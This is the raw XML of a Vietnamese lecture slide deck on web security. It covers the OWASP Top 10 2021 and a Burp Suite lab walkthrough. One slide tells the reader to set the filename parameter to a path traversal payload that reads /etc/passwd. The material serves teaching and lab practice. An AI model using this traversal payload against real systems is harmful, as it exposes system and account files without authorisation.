              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dừng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56BFDADA-9D4E-A1E7-ACEC-E1FB442A815C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="301535" y="1297683"/>
            <a:ext cx="8540930" cy="3922017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26271538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06611-95F4-07D0-4EB4-3542ACA87A4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CEDD25F-CB74-57DA-CA2D-ED7824E44B8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EEAB9495-FB2F-ADBB-9E2C-27236910754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168</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D121FEB5-CBE1-F1FD-165B-63EF6A57BDEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Forward </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>truyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hoàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95371EAC-544E-4E22-9764-1C388F75C11E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="1245392"/>
            <a:ext cx="8748486" cy="3224215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18286448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AE82-0A60-F725-F7C1-5E59E8ED0F9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A07218C-DA7E-92B7-ED4F-C53D2892045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1DE9895E-3B67-362E-62EE-969A4BBBC95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169</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E437E4-C6AC-C6B2-0003-9B6C6FC02CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Trang sẽ tải tiếp được giao diện, nhưng dữ liệu hình ảnh bị chặn lại</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F33EB0EF-D0B8-AAF3-95FC-66C66B77A6D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1489310"/>
            <a:ext cx="8915399" cy="3962142"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2183896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BF46-EF80-204B-57E2-0F9C8C1B36B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3036EDC-D319-FF33-EA40-6038BCB48EAF}"/>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F3198EE-7593-E486-2BB5-B5B1ADADA78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.3.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> OWASP Top 10-2021</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F4663524-5BB9-CDBB-A527-45D77A4D35D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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB5C1A35-6960-1348-C572-9FB340EA80A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226541" y="1969322"/>
            <a:ext cx="4808357" cy="287514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A01:2021-Broken Access Control (Kiểm soát truy cập bị hỏng): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tăng từ vị trí thứ năm, cho thấy 94% ứng dụng được kiểm tra có vấn đề về kiểm soát truy cập.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7172" name="Picture 4" descr="OWASP Top 10 security vulnerabilities 2021 Evalian®">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F55D35-7F27-E553-E858-79E605E6C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20294"/>
            <a:ext cx="3923030" cy="385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0779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FDD23-B988-2016-87CC-677BCF32F74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D40FDFD-85B3-12A8-C927-F4FD7BB0AA1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46A6410F-A2ED-CFBE-6E0A-3AA900CBC9A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170</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90FA47C4-6CB4-7BE6-5ED0-4A02320B3E89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="103290" y="793798"/>
            <a:ext cx="9040710" cy="4292576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1292728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124A8-080B-3609-DC07-8E759408E53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252E3B-677C-6BA6-1E3D-3D6FB284435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D61141DA-AA1D-B101-BCBA-540E0685111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171</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{543A734C-FAD6-AA7B-FB8F-200375A429E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Chọn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ngầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> URL của 1 ảnh chuột phải vào send to Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD0A02E-65BE-2FCD-AA1A-F673E5B96D68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="1260738"/>
            <a:ext cx="8668657" cy="3667007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19973630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12A9E-9544-81AE-B257-B878DB900D5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1311003-57E3-395D-0C8E-A2470D04F01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DD137ED8-DCC2-4FA8-EBF9-9213251E174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172</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E6EBFBE-5024-64CF-C291-92DD5D246605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Qua tab Repeater để chỉnh sửa:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5CAEA5-3C33-4DAD-3BD9-119EC3BA4D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894568" y="1059066"/>
            <a:ext cx="5162550" cy="4467225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38189858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E5C74-E5E5-0C1B-FEA5-036EB81B003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13E512A-816A-42AB-487A-8F3DF530517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D347CEAC-BA4A-6995-8CE0-8B137E2CEE2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173</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7836864-4B8A-4082-2919-0D9CFFA66CF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Lý </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thuyết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đoạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hỏng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC3816E-D6D1-645E-8C01-05EC7D6CA303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="652069" y="1349317"/>
            <a:ext cx="7798751" cy="3276595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31122081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FF084-9B8B-A4F2-FEED-2B4B58B9922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136748B-F0EE-6662-725B-C583354FED8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B5507FDD-5E92-8E00-7FF7-275AAB61023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174</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52EC59DE-6B7E-4FE4-A27E-848829AC66A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="342899"/>
            <a:ext cx="8130554" cy="1600199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123445B5-34BA-B7DC-7B49-A4DEE8C12BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2355539" y="1943098"/>
            <a:ext cx="4333875" cy="3714753"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22302005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DFA13-B9D0-08A5-1E37-D8B2B52C78C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80CA76-8BED-D939-1993-93725FE2627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634233C-0A08-04BB-7EB3-5F266FC6180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175</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D87EC06-A3A2-6C01-4222-ABFA2C6EE908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Chỉnh filename = ../../../etc/passwd và bấm send:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263CB06D-BAD0-D4D5-8F4D-2E018EC07AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
